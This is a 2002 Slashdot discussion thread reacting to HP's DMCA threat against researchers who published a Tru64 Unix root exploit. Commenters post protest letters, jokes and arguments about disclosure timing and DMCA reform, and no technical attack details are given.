      I just read about your company's threat of action under the DMCA against a security researcher who released exploit information about your Tru64 Unix product. As a software engineer working for a large competitor of yours, I'd like to thank you for your actions. The well-earned reputation for security and reliability of our product can only be enhanced by ill-mannered attempts at suppressing information from your company. Any further help you can provide in assuring my future job security in this uncertain economy will be greatly appreciated.
    • My mail to Carly (Score:4, Interesting)

      by CrayDrygu ( 56003 ) on Tuesday July 30, 2002 @10:31PM (#3983553)
      Mrs Fiorina,

      I work for a retailer -- Best Buy -- which sells a large volume of HP and Compaq products. I have long been a fan of Hewlett Packard, but some recent news is troubling me.

      Kent Ferson's reaction to Phased's posting of the security vulnerability in Tru64 was nothing short of shockingly irresponsible.

      Not only am I disturbed that there was no statement of any intent to fix the security hole, but I am shocked at the threat of a lawsuit under the DMCA. You should be grateful that the hole was brought to your attention before it became a widespread problem, not to mention that had you fixed it in a timely manner (as the hole was revealed to you by SnoSoft last year), this would never have been a problem.

      This reaction tells me that not only is HP/Compaq concerned more with their image than with ensuring the quality of their products, but that "The New HP" would rather abuse copyright law by "shooting the messenger" than issue a responsible statement, and repair an error before it becomes a problem.

      I'll be waiting in the next few days for a press release or some other statement denouncing Mr. Ferson's actions, and showing that HP has plans to repair the hole in Tru64. Until this happens, I'm not sure I'll be able to reccomend that anyone give their money to Hewlett Packard.

      Looking forward to your response.

      [Name Removed]
  • by ewhac ( 5844 ) on Tuesday July 30, 2002 @09:04PM (#3983092) Homepage Journal

    HP Classic would never have pulled a stunt like this. They would have gone, "Oops, my bad, here's a bugfix everyone."

    As time goes on, it looks more and more as if Walter Hewlett and David Packard were right: This whole "New HP" thing is just so much hogwash.

    Schwab

  • by shokk ( 187512 ) <ernieoporto AT yahoo DOT com> on Tuesday July 30, 2002 @09:06PM (#3983102) Homepage Journal
    For those of you who are HPaq-ese impaired, here is the message:

    Dear HPaq customers,
    We thank you for having purchased our products in the past, but now that we have finalized our merger and cashed our options, we have lost our minds and come to the boggling conclusion that we don't want your money anymore. Please do not buy our products because honestly you can't trust us to inform you when there is a defect with our product. This includes any servers, and handhelds our merger partner might peddle, printers, or whatever the hell it is these people do. As a sign of our gratitude for your service, we will be providing each future customer with a free Berber mousepad under which you can sweep any problems you discover. I you believe the problem doesn't exist, and we believe the problem doesn't exist, then we can work together to warp reality and drive cusomers away like poor starving slobs on the street corner to a free luncheon. Personally, I don't recommend you use these things in anything that might risk a human life or attempt to improve society in any way. Heck, I wouldn't run my porn servers on this crap. Well, gotta run, muy coke dealer is here. And don't forget to F off!

    P.S. - Don't unravel the mousepad to see how it's made or we'll sue your ass into orbit under the DCMA.
  • What a perfect example - a really easy to demonstrate abuse that the DMCA allows. Hell, I could show this case to my non-techie relatives, and they'd understand just how wrong it is. Go HP - this type of bullying helps more then 10 highly payed lobbiests.
  • by aebrain ( 184502 ) <aebrain@gmail.com> on Tuesday July 30, 2002 @09:20PM (#3983183) Homepage Journal

    Perhaps HP - having stopped Bruce Perens from protesting against the DMCA via civil disobedience - is attacking it via a reductio ad absurdum method. i.e. Showing exactly how it violates the principles of Free Speech. It's officially illegal to state that the Emperor has no clothes.

  • Dear Ms. Fiorina (Score:5, Interesting)

    by Gerdts ( 125105 ) on Tuesday July 30, 2002 @09:25PM (#3983214)
    Posted at http://www.hp.com/hpinfo/execteam/email/fiorina/in dex.htm [hp.com]

    I am quite disappointed with HP's recent conduct with two issues related to the DMCA. I am in a senior enough position as a UNIX administrator that I have significant impact in how a multi-million dollar IT budget is spent. HP's invocation of the DMCA reduces my trust in HP as a vendor of secure and reliable technology. Therefore I am less inclined now than I ever have been in the past to purchase HP products.

    The first issue is HP's request that Bruce Parens not present his findings on DVD copyright controls. If he is acting on his own behalf, and includes a disclaimer that this is a separate issue from what he does under the employment of HP, he should be allowed to go forth. If he is presenting HP intellectual property, HP has the right and responsibility to protect itself. This, however, does not seem to be the case.

    The more disturbing issue is with regards to the handling of SnoSoft's publication of root exploits to the Tru64 operating system. As a UNIX administrator, I am responsible for researching technologies that I will put into production. Many times, these products are used to protect the intellectual property, stability, or other things that are of great importance to my employer's success and my career. If security researchers cannot force many of the bugs out in the open before I evaluate products, I have much more work on my hands. Furthermore, if I find a bug that I know can be used to compromise my system, without the ability to publicly discuss and disclose the bug, I may be unable to get a fix from the vendor or a home-grown workaround. If I am at the complete mercy of my vendors' good will, I fear that I will have a system that lacks stability and security.

    Please reconsider your decision to use the Digital Millenium Copyright Act to stifle free speech. Once you come to the realization that the DMCA is not a law that is useful for HP, please put your lobbying efforts into repealing it and push for funding to enforce pre-DMCA laws that already provide more than adequate protections on copyright and other intellectual property issues.

    I do not speak for my employer. Please remember, however, that my employer trusts me to make decisions that are in the employer's best interest. Your actions suggest that the purchase of HP products is in the best interest of no employer that I would work for.

  • by richieb ( 3277 ) <richieb@gmai l . com> on Tuesday July 30, 2002 @09:52PM (#3983376) Homepage Journal
    Frankly, I think that all the security experts should stop looking at Tru64 and just publicize the fact that they don't recomend it for uses where security is required.

    Let the crackers have it.

  • by jsse ( 254124 ) on Tuesday July 30, 2002 @11:39PM (#3983812) Homepage Journal
    Just in case few of us here don't know about him. You can find his homepage here [perens.com]
    , and in his Bio [perens.com] you can find:

    " Hewlett-Packard Corporation - 2000 to Present

    Senior strategist, Linux and Open Source. I am the first Open Source evangelist to gain a role in top management of a multi-Billion-dollar corporation. On the org chart there are only three people between me and the CEO - a general manager, a vice president, and a president. Among my assignments is to challenge HP management."

    So he's in position to speak up in this case.

    Note: I don't know if it's redundent but I'm sure some people would like to know. I don't ask for any mod point.
  • by jsse ( 254124 ) on Wednesday July 31, 2002 @12:36AM (#3984014) Homepage Journal
    I can see it here, US Government is progressively inventing laws that ensures:

    Only the Government can investigate crimes.
    Only the Government can test, examine, uncover defectives in consummer products
    Only the Government can perform reverse engineering on anything
    Only the Government is allowed to use top-grade encryption
    The scope of Free Speech is defined by senators, and it happens that no constitutional right are being intruded.

    That's to say, US would become a country where citizens, by laws, SHOULD trust the Government and any questions on the already established laws and regulations are prohibited.

    What's wrong with the picture? I don't know, but I've read a novel book about a country whose government has absolute power over their citizens and no citizen is allowed to question the decision of the government. This government does not use any military power or violence to control their citizens, but by laws.

    IIRC at the end of this story all the citizens end up living in an array of big tubes of liquid, and the rest of the rebels are either jailed(brains were sperated from their body) or terminated(becomes food for others). It's like Matrix, but this time some humans control everything.

    ....Imagine, no violence, no crime, no hunger...a perfect world!
  • by Sean Clifford ( 322444 ) on Wednesday July 31, 2002 @12:40AM (#3984022) Journal
    Well, then. This clearly demonstrates why *not* to use HP's Unix in your shop; I won't use it in mine. Nor will I use their software or services - you can't trust them. This stupid insular policy against public disclosure only ensures that (a) exploits aren't known, and (b) aren't patched, and (c) cannot be defended against.

    Don't say it...don't say it...I'm warning you...

    Use Linux.

    Damn, I said it.

    Why the fuck don't people want exploits fully disclosed? Sure, I don't have a problem with waiting a week or so to give a team/vendor (yes, even Microsoft) a chance to roll out a patch before making it public. It's a courtesy, not a necessity.

    <rant />
    Clearly some sort of political action is required. I suggest:

    1. The DMCA needs to be repealed or ruled unconstitutional. Hopefully the ACLU or the EFF will take a case that'll get us there. Or some rich philanthropist geek could 'violate' it by exercising their constitutional rights. But the best ploy is for every one of *us* to contact (visit,snailmail,fax,call,email) 'our' reps in the House [house.gov] and Senate [senate.gov], rationally outline our objections, and protest like hell if they don't. Civil disobedience, etc.

    2. Abolish corporate personhood (same methods).

    3. Abolish the lobby industry.

    4. Abolish campaign finance. Make it publicly funded, free TV-radio spots (public airwaves) equally distributed among ballot-qualified candidates.

    We've let corporations have far too much swing. I'm all for making a buck, but Jesus F***ing Christ...

  • by LordNimon ( 85072 ) on Wednesday July 31, 2002 @12:45AM (#3984037)
    This is a letter I just sent to my Representative and Senators. Permission is given to anyone who wants to use this text to send a similar letter.

    Today I read an article on news.com (http://news.com.com/2100-1023-947325.html) that Hewlett-Packard has intended to use the Digital Millennium Copyright Act (DMCA) to punish a company that has released information about a security vulnerability in an HP product. For quite some time I have been telling you that the DMCA is a bad law that needs to be repealed, and this is just more evidence to that effect. HP has known about this vulnerability for a year, but has chosen to do nothing to fix it.

    HP's action could set a precedent that would stifle technology research. Companies would be free to release broken technologies that would eventually be used in high-security environments. Anyone who attempted to test the strengths of these products would be branded a criminal.

    HP's customers and the American public deserve to know about security issues in HP's products. Withholding such information is just like the accounting scandals that have been rampant in recent times. Insecure technology is a weapon that hackers and terrorists can use against us. So when an American company decides to hide behind an American law rather than fix it products, our politicians need to re-examine that law.

    I urge you to sponsor legislation that will repeal the DMCA. Americans deserve better. Please write back to me and let me know that you support my fair use rights in a digital world, and that you'll be working to repeal the DMCA.

  • by matthew_gream ( 113862 ) on Wednesday July 31, 2002 @04:45AM (#3984751) Homepage

    I think HP is wrong with its DMCA style threats, because they are not appropriate. However, I can sympathise with HP and understand why they may have "lashed out". I think the hacker in question was wrong to irresponsibly post the exploit for script kiddies to start playing with fire. For all the debate about various sorts of disclosure processes, it's quite clear that this approach potentially has a high impact upon any deployed systems and gives no time for either the vendors or the administrators to take action. This is just not a responsible real-world approach to dealing with security issues.

    • The problem is that this gives a rise to the other question... How long to wait before making something public?

      The person that made the information public knew that HP has had the information SEVERAL MONTHS before making the exploit public.

      Its true that it may have been better to contact CERT first (note: HP already knew); post to bugtraq, but DESCRIBE the issue and not post the exploit... THEN once the PUBLIC description is made {and still no response from HP} [I say maybe give HP 14 working days] only then post the exploit as as done..

I have hardly ever known a mathematician who was capable of reasoning. -- Plato

Working...